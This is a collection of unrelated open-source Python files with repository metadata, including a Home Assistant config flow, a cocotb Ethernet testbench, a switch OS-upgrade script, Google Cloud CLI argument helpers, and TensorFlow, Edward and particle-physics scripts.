CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
def __init__(self):
"""Initialize the flow."""
self.username = None
async def async_step_user(self, user_input=None):
"""Handle a flow initiated by the user."""
errors = {}
if user_input is not None:
client = OVOEnergy()
try:
authenticated = await client.authenticate(
user_input[CONF_USERNAME], user_input[CONF_PASSWORD]
)
except aiohttp.ClientError:
errors["base"] = "cannot_connect"
else:
if authenticated:
await self.async_set_unique_id(user_input[CONF_USERNAME])
self._abort_if_unique_id_configured()
return self.async_create_entry(
title=client.username,
data={
CONF_USERNAME: user_input[CONF_USERNAME],
CONF_PASSWORD: user_input[CONF_PASSWORD],
},
)
errors["base"] = "invalid_auth"
return self.async_show_form(
step_id="user", data_schema=USER_SCHEMA, errors=errors
)
async def async_step_reauth(self, user_input):
"""Handle configuration by re-auth."""
errors = {}
if user_input and user_input.get(CONF_USERNAME):
self.username = user_input[CONF_USERNAME]
self.context["title_placeholders"] = {CONF_USERNAME: self.username}
if user_input is not None and user_input.get(CONF_PASSWORD) is not None:
client = OVOEnergy()
try:
authenticated = await client.authenticate(
self.username, user_input[CONF_PASSWORD]
)
except aiohttp.ClientError:
errors["base"] = "connection_error"
else:
if authenticated:
await self.async_set_unique_id(self.username)
for entry in self._async_current_entries():
if entry.unique_id == self.unique_id:
self.hass.config_entries.async_update_entry(
entry,
data={
CONF_USERNAME: self.username,
CONF_PASSWORD: user_input[CONF_PASSWORD],
},
)
return self.async_abort(reason="reauth_successful")
errors["base"] = "authorization_error"
return self.async_show_form(
step_id="reauth", data_schema=REAUTH_SCHEMA, errors=errors
)
| [
"noreply@github.com"
] | turbokongen.noreply@github.com |
d4b37b4be69c7bd3ef9bfd185f240b150b6a97cd | 9c268aa04ab8b359d11399f94a30c8f4fe171a0c | /tb/eth_mac_1g_gmii_fifo/test_eth_mac_1g_gmii_fifo.py | 1879de7188d98184a75f8464c03b1ceacfb43b1f | [
"MIT"
] | permissive | alexforencich/verilog-ethernet | e41586b9214e66341f3eace03da2baa9c004da89 | b316c6764e083823f95f52b3f324fccee4f12fa0 | refs/heads/master | 2023-09-03T00:58:09.380285 | 2023-08-26T19:44:50 | 2023-08-26T19:44:50 | 26,883,874 | 1,690 | 530 | MIT | 2023-08-25T05:59:58 | 2014-11-19T22:04:53 | Verilog | UTF-8 | Python | false | false | 7,694 | py | #!/usr/bin/env python
"""
Copyright (c) 2020 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import cocotb_test.simulator
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge
from cocotb.regression import TestFactory
from cocotbext.eth import GmiiFrame, GmiiPhy
from cocotbext.axi import AxiStreamBus, AxiStreamSource, AxiStreamSink
class TB:
def __init__(self, dut, speed=1000e6):
self.dut = dut
self.log = logging.getLogger("cocotb.tb")
self.log.setLevel(logging.DEBUG)
cocotb.start_soon(Clock(dut.gtx_clk, 8, units="ns").start())
cocotb.start_soon(Clock(dut.logic_clk, 8, units="ns").start())
self.gmii_phy = GmiiPhy(dut.gmii_txd, dut.gmii_tx_er, dut.gmii_tx_en, dut.mii_tx_clk, dut.gmii_tx_clk,
dut.gmii_rxd, dut.gmii_rx_er, dut.gmii_rx_dv, dut.gmii_rx_clk, speed=speed)
self.axis_source = AxiStreamSource(AxiStreamBus.from_prefix(dut, "tx_axis"), dut.logic_clk, dut.logic_rst)
self.axis_sink = AxiStreamSink(AxiStreamBus.from_prefix(dut, "rx_axis"), dut.logic_clk, dut.logic_rst)
dut.cfg_ifg.setimmediatevalue(0)
dut.cfg_tx_enable.setimmediatevalue(0)
dut.cfg_rx_enable.setimmediatevalue(0)
async def reset(self):
self.dut.gtx_rst.setimmediatevalue(0)
self.dut.logic_rst.setimmediatevalue(0)
await RisingEdge(self.dut.tx_clk)
await RisingEdge(self.dut.tx_clk)
self.dut.gtx_rst.value = 1
self.dut.logic_rst.value = 1
await RisingEdge(self.dut.tx_clk)
await RisingEdge(self.dut.tx_clk)
self.dut.gtx_rst.value = 0
self.dut.logic_rst.value = 0
await RisingEdge(self.dut.tx_clk)
await RisingEdge(self.dut.tx_clk)
def set_speed(self, speed):
pass
async def run_test_rx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6):
tb = TB(dut, speed)
tb.gmii_phy.rx.ifg = ifg
tb.dut.cfg_ifg.value = ifg
tb.dut.cfg_rx_enable.value = 1
tb.set_speed(speed)
await tb.reset()
for k in range(100):
await RisingEdge(dut.rx_clk)
if speed == 10e6:
assert dut.speed == 0
elif speed == 100e6:
assert dut.speed == 1
else:
assert dut.speed == 2
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
test_frame = GmiiFrame.from_payload(test_data)
await tb.gmii_phy.rx.send(test_frame)
for test_data in test_frames:
rx_frame = await tb.axis_sink.recv()
assert rx_frame.tdata == test_data
assert rx_frame.tuser == 0
assert tb.axis_sink.empty()
await RisingEdge(dut.rx_clk)
await RisingEdge(dut.rx_clk)
async def run_test_tx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6):
tb = TB(dut, speed)
tb.gmii_phy.rx.ifg = ifg
tb.dut.cfg_ifg.value = ifg
tb.dut.cfg_tx_enable.value = 1
tb.set_speed(speed)
await tb.reset()
for k in range(100):
await RisingEdge(dut.rx_clk)
if speed == 10e6:
assert dut.speed == 0
elif speed == 100e6:
assert dut.speed == 1
else:
assert dut.speed == 2
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
await tb.axis_source.send(test_data)
for test_data in test_frames:
rx_frame = await tb.gmii_phy.tx.recv()
assert rx_frame.get_payload() == test_data
assert rx_frame.check_fcs()
assert rx_frame.error is None
assert tb.gmii_phy.tx.empty()
await RisingEdge(dut.tx_clk)
await RisingEdge(dut.tx_clk)
def size_list():
return list(range(60, 128)) + [512, 1514] + [60]*10
def incrementing_payload(length):
return bytearray(itertools.islice(itertools.cycle(range(256)), length))
def cycle_en():
return itertools.cycle([0, 0, 0, 1])
if cocotb.SIM_NAME:
for test in [run_test_rx, run_test_tx]:
factory = TestFactory(test)
factory.add_option("payload_lengths", [size_list])
factory.add_option("payload_data", [incrementing_payload])
factory.add_option("ifg", [12])
factory.add_option("speed", [1000e6, 100e6, 10e6])
factory.generate_tests()
# cocotb-test
tests_dir = os.path.abspath(os.path.dirname(__file__))
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
lib_dir = os.path.abspath(os.path.join(rtl_dir, '..', 'lib'))
axis_rtl_dir = os.path.abspath(os.path.join(lib_dir, 'axis', 'rtl'))
def test_eth_mac_1g_gmii_fifo(request):
dut = "eth_mac_1g_gmii_fifo"
module = os.path.splitext(os.path.basename(__file__))[0]
toplevel = dut
verilog_sources = [
os.path.join(rtl_dir, f"{dut}.v"),
os.path.join(rtl_dir, "eth_mac_1g_gmii.v"),
os.path.join(rtl_dir, "gmii_phy_if.v"),
os.path.join(rtl_dir, "ssio_sdr_in.v"),
os.path.join(rtl_dir, "ssio_sdr_out.v"),
os.path.join(rtl_dir, "oddr.v"),
os.path.join(rtl_dir, "eth_mac_1g.v"),
os.path.join(rtl_dir, "axis_gmii_rx.v"),
os.path.join(rtl_dir, "axis_gmii_tx.v"),
os.path.join(rtl_dir, "lfsr.v"),
os.path.join(axis_rtl_dir, "axis_adapter.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo_adapter.v"),
]
parameters = {}
parameters['AXIS_DATA_WIDTH'] = 8
parameters['AXIS_KEEP_ENABLE'] = int(parameters['AXIS_DATA_WIDTH'] > 8)
parameters['AXIS_KEEP_WIDTH'] = parameters['AXIS_DATA_WIDTH'] // 8
parameters['ENABLE_PADDING'] = 1
parameters['MIN_FRAME_LENGTH'] = 64
parameters['TX_FIFO_DEPTH'] = 16384
parameters['TX_FRAME_FIFO'] = 1
parameters['TX_DROP_OVERSIZE_FRAME'] = parameters['TX_FRAME_FIFO']
parameters['TX_DROP_BAD_FRAME'] = parameters['TX_DROP_OVERSIZE_FRAME']
parameters['TX_DROP_WHEN_FULL'] = 0
parameters['RX_FIFO_DEPTH'] = 16384
parameters['RX_FRAME_FIFO'] = 1
parameters['RX_DROP_OVERSIZE_FRAME'] = parameters['RX_FRAME_FIFO']
parameters['RX_DROP_BAD_FRAME'] = parameters['RX_DROP_OVERSIZE_FRAME']
parameters['RX_DROP_WHEN_FULL'] = parameters['RX_DROP_OVERSIZE_FRAME']
extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}
sim_build = os.path.join(tests_dir, "sim_build",
request.node.name.replace('[', '-').replace(']', ''))
cocotb_test.simulator.run(
python_search=[tests_dir],
verilog_sources=verilog_sources,
toplevel=toplevel,
module=module,
parameters=parameters,
sim_build=sim_build,
extra_env=extra_env,
)
| [
"alex@alexforencich.com"
] | alex@alexforencich.com |
ad0716b036a955c295028b8c16f49890ea6ae1bb | e96ffb6103e1e9396c19312710d523f1bada0595 | /system_program/upgrade_os.py | 78e448d3cb8af6635b75b0c09b0821bd5cfe2530 | [] | no_license | ktsdn/switch_application | 9e1e6558aa295b8bd7512d06d24fdeb2cf15d50a | 9e6b6f1186ef48320a5f21cc8a908fbfede54aba | refs/heads/master | 2016-09-06T19:48:42.092557 | 2014-06-16T17:45:43 | 2014-06-16T17:45:43 | 19,848,643 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,851 | py | #!/usr/bin/python
import os, re, subprocess, sys, urllib, string, Tac, EntityManager
sys.stdout
if len(sys.argv) != 2:
print sys.argv[0]+" requres [os image name]"
sys.exit()
osimage_name=sys.argv[1]
configUrl = "http://20.0.2.224/os/%s"
parsedUrl = configUrl % ( osimage_name )
# Look at the boot-config file and get the currently set EOS version
fd = open("/etc/swi-version", "r")
for item in fd:
if "SWI_VERSION=" in item:
swiversion = item.strip('SWI_VERSION=|\n')
fd.close()
#This allows output to the console during boot time
def printLog( logmsg ):
print logmsg
os.system( '/usr/bin/logger -p local4.crit -t ZeroTouch %s' % logmsg )
ret = urllib.urlopen(parsedUrl)
updateBootConfig = False
if int(ret.info()['content-length']) < 2048:
printLog('there is no os images or permission to download')
sys.exit()
else:
if ret.info()['content-type'] == 'application/vnd.aristanetworks.swi':
if not os.path.isfile('/mnt/flash/%s' % osimage_name):
download = True
else:
download = False
updateBootConfig = True
printLog(osimage_name+' already existed in /mnt/flash')
# download processing
if download == True:
swiSize = ret.info()['content-length']
urllib.urlretrieve(parsedUrl, '/mnt/flash/%s' % osimage_name)
printLog('download url = %s' % parsedUrl)
localFileSize = str(os.stat('/mnt/flash/%s' % osimage_name).st_size)
if swiSize == localFileSize:
printLog ('Downloaded %s' % osimage_name)
updateBootConfig = True
else:
printLog ('Download failed, exiting')
updateBootConfig = False
else:
printLog('this image is not os image, content-type is wrong')
sys.exit()
ret.close()
# Change the boot-config file to new version
if updateBootConfig:
fd = open("/mnt/flash/boot-config", "w")
fd.write("SWI=flash:%s\n\n" % osimage_name)
fd.close()
sys.exit()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
d5b7faf942dad1ccd22553726dc85d68233b94b4 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/11166141.py | 278d2a652da2694d5480708b494ecc58d53edac3 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11166141.py generated: Wed, 25 Jan 2017 15:25:27
#
# Event Type: 11166141
#
# ASCII decay Descriptor: [B0 -> (D*(2010)- -> (D~0 -> (KS0 -> pi+ pi-) pi+ pi-) pi-) pi+]cc
#
from Configurables import Generation
Generation().EventType = 11166141
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_Dst-pi,KSpipi=DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
0f62e49af163ce60e641517c8e094dc79f51ed77 | d842a95213e48e30139b9a8227fb7e757f834784 | /gcloud/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/secrets/args.py | 8263c671f43b9e8f6e2e916e137e2d0b4170bf43 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | bopopescu/JobSniperRails | f37a15edb89f54916cc272884b36dcd83cdc868a | 39e7f871887176770de0f4fc6789e9ddc7f32b1f | refs/heads/master | 2022-11-22T18:12:37.972441 | 2019-09-20T22:43:14 | 2019-09-20T22:43:14 | 282,293,504 | 0 | 0 | MIT | 2020-07-24T18:47:35 | 2020-07-24T18:47:34 | null | UTF-8 | Python | false | false | 6,385 | py | # -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared resource arguments and flags."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope.concepts import concepts
from googlecloudsdk.command_lib.util.concepts import concept_parsers
from googlecloudsdk.core import resources
# Args
def AddCreateIfMissing(parser, resource, positional=False, **kwargs):
parser.add_argument(
_ArgOrFlag('create-if-missing', positional),
action='store_true',
help=('Create the {resource} if it does not exist. If this flag is not '
'set, the command will return an error when attempting to update a '
'{resource} that does not exist.').format(resource=resource),
**kwargs)
def AddDataFile(parser, positional=False, **kwargs):
parser.add_argument(
_ArgOrFlag('data-file', positional),
metavar='PATH',
help=('File path from which to read secret data. Set this to "-" to read '
'the secret data from stdin.'),
**kwargs)
def AddProject(parser, positional=False, **kwargs):
concept_parsers.ConceptParser.ForResource(
name=_ArgOrFlag('project', positional),
resource_spec=GetProjectResourceSpec(),
group_help='The project ID.',
**kwargs).AddToParser(parser)
def AddLocation(parser, purpose, positional=False, **kwargs):
concept_parsers.ConceptParser.ForResource(
name=_ArgOrFlag('location', positional),
resource_spec=GetLocationResourceSpec(),
group_help='The location {}.'.format(purpose),
**kwargs).AddToParser(parser)
# TODO(b/135570696): may want to convert to resource arg & add fallthrough
def AddLocations(parser, resource, positional=False, **kwargs):
parser.add_argument(
_ArgOrFlag('locations', positional),
action=arg_parsers.UpdateAction,
metavar='LOCATION',
type=arg_parsers.ArgList(),
help=('Comma-separated list of locations in which the {resource} should '
'be replicated.').format(resource=resource),
**kwargs)
def AddSecret(parser, purpose, positional=False, **kwargs):
concept_parsers.ConceptParser.ForResource(
name=_ArgOrFlag('secret', positional),
resource_spec=GetSecretResourceSpec(),
group_help='The secret {}.'.format(purpose),
**kwargs).AddToParser(parser)
def AddVersion(parser, purpose, positional=False, **kwargs):
concept_parsers.ConceptParser.ForResource(
name=_ArgOrFlag('version', positional),
resource_spec=GetVersionResourceSpec(),
group_help='Numeric secret version {}.'.format(purpose),
**kwargs).AddToParser(parser)
def _ArgOrFlag(name, positional):
"""Returns the argument name in resource argument format or flag format.
Args:
name (str): name of the argument
positional (bool): whether the argument is positional
Returns:
arg (str): the argument or flag
"""
if positional:
return name.upper().replace('-', '_')
return '--{}'.format(name)
### Attribute configurations
def GetProjectAttributeConfig():
return concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG
def GetLocationAttributeConfig():
return concepts.ResourceParameterAttributeConfig(
name='location',
help_text='The location of the {resource}.',
completion_request_params={'fieldMask': 'name'},
completion_id_field='name')
def GetSecretAttributeConfig():
return concepts.ResourceParameterAttributeConfig(
name='secret',
help_text='The secret of the {resource}.',
completion_request_params={'fieldMask': 'name'},
completion_id_field='name')
def GetVersionAttributeConfig():
return concepts.ResourceParameterAttributeConfig(
name='version',
help_text='The version of the {resource}.',
completion_request_params={'fieldMask': 'name'},
completion_id_field='name')
# Resource specs
def GetProjectResourceSpec():
return concepts.ResourceSpec(
resource_collection='secretmanager.projects',
resource_name='project',
plural_name='projects',
disable_auto_completers=False,
projectsId=GetProjectAttributeConfig())
def GetLocationResourceSpec():
return concepts.ResourceSpec(
resource_collection='secretmanager.projects.locations',
resource_name='location',
plural_name='locations',
disable_auto_completers=False,
locationsId=GetLocationAttributeConfig(),
projectsId=GetProjectAttributeConfig())
def GetSecretResourceSpec():
return concepts.ResourceSpec(
resource_collection='secretmanager.projects.secrets',
resource_name='secret',
plural_name='secrets',
disable_auto_completers=False,
secretsId=GetSecretAttributeConfig(),
projectsId=GetProjectAttributeConfig())
def GetVersionResourceSpec():
return concepts.ResourceSpec(
'secretmanager.projects.secrets.versions',
resource_name='version',
plural_name='version',
disable_auto_completers=False,
versionsId=GetVersionAttributeConfig(),
secretsId=GetSecretAttributeConfig(),
projectsId=GetProjectAttributeConfig())
# Resource parsers
def ParseProjectRef(ref, **kwargs):
kwargs['collection'] = 'secretmanager.projects'
return resources.REGISTRY.Parse(ref, **kwargs)
def ParseLocationRef(ref, **kwargs):
kwargs['collection'] = 'secretmanager.projects.locations'
return resources.REGISTRY.Parse(ref, **kwargs)
def ParseSecretRef(ref, **kwargs):
kwargs['collection'] = 'secretmanager.projects.secrets'
return resources.REGISTRY.Parse(ref, **kwargs)
def ParseVersionRef(ref, **kwargs):
kwargs['collection'] = 'secretmanager.projects.secrets.versions'
return resources.REGISTRY.Parse(ref, **kwargs)
| [
"luizfper@gmail.com"
] | luizfper@gmail.com |
d38e23d4fe46dcbd8af662da3ec32e0ddd091617 | e5ea52ee45b1938fdafee1b43e472cc7d7fbaed7 | /content/downloads/code/test_edward.py | 67cddc71179cfee70a615cc8fe0ed4facb909578 | [
"MIT"
] | permissive | mattpitkin/samplers-demo | fabe2735ba80706fc8688e462797cb1919e03109 | b511f891a30fb46c215c065ceb7e618c820d4d03 | refs/heads/master | 2022-07-31T05:33:59.252825 | 2022-07-18T12:16:06 | 2022-07-18T12:16:06 | 119,070,470 | 8 | 1 | MIT | 2021-05-20T09:47:35 | 2018-01-26T15:47:25 | Jupyter Notebook | UTF-8 | Python | false | false | 1,759 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Example of running edward to fit the parameters of a straight line.
"""
from __future__ import print_function, division
import os
import sys
import numpy as np
import matplotlib as mpl
mpl.use("Agg") # force Matplotlib backend to Agg
# import edward and TensorFlow
import edward as ed
import tensorflow as tf
from edward.models import Normal, Uniform, Empirical
# import model and data
from createdata import *
# set the priors
cmin = -10. # lower range of uniform distribution on c
cmax = 10. # upper range of uniform distribution on c
cp = Uniform(low=cmin, high=cmax)
mmu = 0. # mean of Gaussian distribution on m
msigma = 10. # standard deviation of Gaussian distribution on m
mp = Normal(loc=mmu, scale=msigma)
# set the likelihood containing the model
y = Normal(loc=mp*x + cp, scale=sigma*tf.ones(len(data)))
# set number of samples
Nsamples = 2000 # final number of samples
Ntune = 2000 # number of tuning samples
# set parameters to infer
qm = Empirical(params=tf.Variable(tf.zeros(Nsamples+Ntune)))
qc = Empirical(params=tf.Variable(tf.zeros(Nsamples+Ntune)))
# use Hamiltonian Monte Carlo
inference = ed.HMC({mp: qm, cp: qc}, data={y: data})
inference.run(step_size=1.5e-2) # higher steps sizes can lead to zero acceptance rates
# extract the samples
msamples = qm.params.eval()[Ntune:]
csamples = qc.params.eval()[Ntune:]
postsamples = np.vstack((msamples, csamples)).T
# plot posterior samples (if corner.py is installed)
try:
import corner # import corner.py
except ImportError:
sys.exit(1)
print('Number of posterior samples is {}'.format(postsamples.shape[0]))
fig = corner.corner(postsamples, labels=[r"$m$", r"$c$"], truths=[m, c])
fig.savefig('edward.png')
| [
"matthew.pitkin@ligo.org"
] | matthew.pitkin@ligo.org |
f89d60d03f53f6543a62034824916e850a8de360 | 51d05aa62e8c21d50bba116b795a003107d14e2a | /detection_app/object_detection_tf_multiprocessing.py | 8389dafb8c6ee25b1da5bc0830915e7e2414388b | [
"MIT"
] | permissive | Airyzf/object_detection_with_tensorflow | 7747659f4dcbca124ca9615872428152c1194204 | 301d1fe316aaa7579dae2b42babe4e8ace0a18e7 | refs/heads/master | 2021-08-24T15:20:33.349083 | 2017-12-10T06:45:03 | 2017-12-10T06:45:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,238 | py | import os
import tarfile
import tensorflow as tf
import multiprocessing
from multiprocessing import Queue
import time
import argparse
import logging
import numpy as np
import cv2
from myutil import downloadutil, fps_measure, queue_seq
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-v', '--video', type=str, required=True,
help="video file for detection")
arg_parser.add_argument('-p', "--process", type=int, default=1,
help="# of detection process")
args = arg_parser.parse_args()
# What model to download.
# MODEL_NAME = 'ssd_mobilenet_v1_coco_2017_11_08'
MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'
def load_graph(model_name=MODEL_NAME):
MODEL_FILE = model_name + '.tar.gz'
DOWNLOAD_BASE = 'http://download.tensorflow.org/models/object_detection/'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = model_name + '/frozen_inference_graph.pb'
downloadutil.maybe_download(os.getcwd(), MODEL_FILE,
DOWNLOAD_BASE+MODEL_FILE)
tar_file = tarfile.open(MODEL_FILE)
for file in tar_file.getmembers():
file_name = os.path.basename(file.name)
if 'frozen_inference_graph.pb' in file_name:
tar_file.extract(file, os.getcwd())
# load graph
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return detection_graph
NUM_CLASSES = 90
def load_label_map(label_map_name, num_class):
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('data', label_map_name)
# load label map
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map,
max_num_classes=num_class, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
return category_index
def detect_object(detection_graph, sess, image, category_index):
with detection_graph.as_default():
with sess.as_default() as sess:
# Definite input and output Tensors for detection_graph
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# image = Image.open(image_path)
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
# image_np = load_image_into_numpy_array(image)
image_np = image
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
# Actual detection.
(boxes, scores, classes, num) = sess.run(
[detection_boxes, detection_scores, detection_classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=8,
min_score_thresh = 0.7)
return image_np
detection_graph = load_graph(model_name=MODEL_NAME)
category_index = load_label_map(label_map_name='mscoco_label_map.pbtxt', num_class=NUM_CLASSES)
image_q = Queue(maxsize=200)
processed_q = queue_seq.Queue_Seq(maxsize=200)
#a process that put imge into image_q
def image_worker(image_q, video_file):
logging.info("image worker start")
video_capture = cv2.VideoCapture(video_file)
ret, frame = video_capture.read()
if not ret:
logging.error("Can not read video file, please check!!!!")
frame_count = 0
while ret:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image_q.put((frame_count, frame))
logging.debug("put image into queue")
ret, frame = video_capture.read()
frame_count += 1
video_capture.release()
input_process = multiprocessing.Process(target=image_worker, args=(image_q, args.video))
# a process to do the detection_graph
def object_detection_worker(image_q, processed_q, detection_graph, category_index, fps=None):
print("detection worker start")
gpu_options = tf.GPUOptions(allow_growth=True)
config = tf.ConfigProto(gpu_options=gpu_options)
sess = tf.Session(graph=detection_graph, config=config)
while True:
frame_count, frame = image_q.get()
t = time.time()
ann_image = detect_object(detection_graph, sess, frame, category_index)
ann_image = cv2.cvtColor(ann_image, cv2.COLOR_RGB2BGR)
if fps:
fps.add_frame()
processed_q.put((frame_count, ann_image))
def main():
# configure logger
logging.basicConfig(
level=logging.INFO,
)
# setup fps counter
fps = fps_measure.FPS()
fps.start_count()
detector_process = [multiprocessing.Process(target=object_detection_worker,
args=(image_q, processed_q, detection_graph, category_index, fps))
for i in range(args.process)]
input_process.start()
for p in detector_process:
p.start()
last_frame = -1
while True:
frame_count, ann_image = processed_q.get()
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(ann_image, 'FPS:{}'.format(int(fps.get_fps())), (50, 50), font, 2, (255, 255, 255), 2, cv2.LINE_AA)
# check frame order
if last_frame != -1:
if last_frame +1 != frame_count:
cv2.putText(ann_image, "Frame order error", (100,100), font, 2, (0, 0, 255), 2, cv2.LINE_AA)
last_frame = frame_count
cv2.imshow('frame', ann_image)
# print("fps is:", fps.get_fps())
if cv2.waitKey(1) & 0xFF == ord('q'):
break
input_process.terminate()
for p in detector_process:
p.terminate()
input_process.join()
for p in detector_process:
p.join()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| [
"scotthuang1989@163.com"
] | scotthuang1989@163.com |
9c48335f00e4ce934b4c7957642e0f09ec30604b | 7c47e106c9ec85a7239c84c55ad5f20972edefcf | /particles/DustParticle.py | b4fb7a915db500a8b4446eb8d19a8df6c7c4a800 | [] | no_license | anasthesia/pyBBN | 11813717ad5023a9b29f9594ccde93fbc2d5a0c9 | 0e88604b765eb5ce2f196909c65cf2af11a8cc2f | refs/heads/master | 2021-01-21T03:37:46.309318 | 2016-05-10T12:03:50 | 2016-05-10T12:03:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,055 | py | """
Non-relativistic simplifications of density, energy density and pressure calculations
"""
import numpy
import IntermediateParticle
name = 'dust'
def density(particle):
""" ## Density
\begin{equation}
n = g \left(\frac{M T}{2 \pi}\right)^{3/2} e^{-\frac{M}{T}}
\end{equation}
"""
return (
particle.dof
* numpy.sqrt(particle.mass * particle.T / 2. / numpy.pi)**3
* numpy.exp(- particle.mass / particle.T)
)
def energy_density(particle):
""" ## Energy density
\begin{equation}
\rho = n \left(M + \frac32 T\right)
\end{equation}
"""
return (particle.mass + 3./2. * particle.T) * density(particle)
def pressure(particle):
""" ## Pressure
\begin{equation}
p = n T
\end{equation}
"""
return density(particle) * particle.T
# ## Master equation terms
# Dust regime does not differ from intermediate regime here.
numerator = IntermediateParticle.numerator
denominator = IntermediateParticle.denominator
| [
"andrew.magalich@gmail.com"
] | andrew.magalich@gmail.com |
fcbdc26bdfbfc32229cd4c6209a56680ffbcab39 | 6e5ab77fee1fb4a0310213dd8c6dd8601828b1b9 | /Algorithm/Swea/D3_17937.py | c33b3d05a10f502e205aa35b54c042cc4e7d0f4a | [] | no_license | hongyong3/TIL | 36d031c0da9e3e6db3eebb977bd3e12df00a849f | 7f1492128e957a78fc95b255f4f7f2978161e471 | refs/heads/master | 2023-08-19T09:16:03.231757 | 2023-08-18T09:38:47 | 2023-08-18T09:38:47 | 162,100,258 | 1 | 0 | null | 2023-02-11T00:52:32 | 2018-12-17T08:42:42 | Jupyter Notebook | UTF-8 | Python | false | false | 198 | py | import sys
sys.stdin = open("D3_17937_input.txt", "r")
T = int(input())
for test_case in range(T):
A, B = map(int, input().split())
print("#{} {}".format(test_case + 1, A if A == B else 1)) | [
"chy66822495@gmail.com"
] | chy66822495@gmail.com |
